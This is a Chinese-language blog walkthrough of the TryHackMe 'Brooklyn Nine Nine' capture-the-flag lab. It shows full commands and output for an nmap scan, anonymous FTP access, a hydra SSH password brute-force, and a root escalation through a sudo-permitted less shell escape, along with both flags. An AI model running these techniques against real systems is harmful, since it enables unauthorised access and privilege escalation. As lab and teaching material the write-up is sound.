美文网首页
【Tryhackme】Brooklyn Nine Nine(ft

【Tryhackme】Brooklyn Nine Nine(ft

作者: 天线锅仔 | 来源:发表于2021-09-25 01:33 被阅读0次

    服务发现

    ┌──(root💀kali)-[~/tryhackme]
└─# nmap -sV -Pn 10.10.60.116                      
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 05:20 EDT
Nmap scan report for 10.10.60.116
Host is up (0.34s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

    匿名登录FTP服务

    ┌──(root💀kali)-[~/tryhackme/brooklyn]
└─# ftp 10.10.60.116   
Connected to 10.10.60.116.
220 (vsFTPd 3.0.3)
Name (10.10.60.116:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.06 secs (1.9443 kB/s)

    下载了一个note_to_jake.txt文件

    查看文件

    ┌──(root💀kali)-[~/tryhackme/brooklyn]
└─# cat note_to_jake.txt 
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

    简直是邀请我们破解他的ssh密码,hydra破解之

    ┌──(root💀kali)-[~/tryhackme/brooklyn]
└─# hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.60.116 ssh -t 20 -v                                                                                                                                                       130 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-24 05:26:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 20 tasks per 1 server, overall 20 tasks, 14344399 login tries (l:1/p:14344399), ~717220 tries per task
[DATA] attacking ssh://10.10.60.116:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://jake@10.10.60.116:22
[INFO] Successful, password authentication is supported by ssh://10.10.60.116:22
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[22][ssh] host: 10.10.60.116   login: jake   password: 987654321
[STATUS] attack finished for 10.10.60.116 (waiting for children to complete tests)

    爆出密码jake:987654321

    /home/holt目录找到user.txt

    ┌──(root💀kali)-[~/tryhackme/brooklyn]
└─# ssh jake@10.10.60.116               
The authenticity of host '10.10.60.116 (10.10.60.116)' can't be established.
ECDSA key fingerprint is SHA256:Ofp49Dp4VBPb3v/vGM9jYfTRiwpg2v28x1uGhvoJ7K4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.60.116' (ECDSA) to the list of known hosts.
jake@10.10.60.116's password: 
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ whoami
jake
jake@brookly_nine_nine:~$ pwd
/home/jake
jake@brookly_nine_nine:~$ cd ..
jake@brookly_nine_nine:/home$ ls
amy  holt  jake
jake@brookly_nine_nine:/home$ cd amy
jake@brookly_nine_nine:/home/amy$ ls
jake@brookly_nine_nine:/home/amy$ cd ../holt/
jake@brookly_nine_nine:/home/holt$ ls
nano.save  user.txt
jake@brookly_nine_nine:/home/holt$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee

    sudo -l查看超级权限,可以使用less

    jake@brookly_nine_nine:/home/holt$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less

    提权到root

    jake@brookly_nine_nine:/home/holt$ sudo less /etc/profile
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796b649e85481845

Enjoy!!
#

    相关文章

      网友评论

          本文标题:【Tryhackme】Brooklyn Nine Nine(ft

          本文链接:https://www.haomeiwen.com/subject/clbzgltx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|【Tryhackme】Brooklyn Nine Nine(ft|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!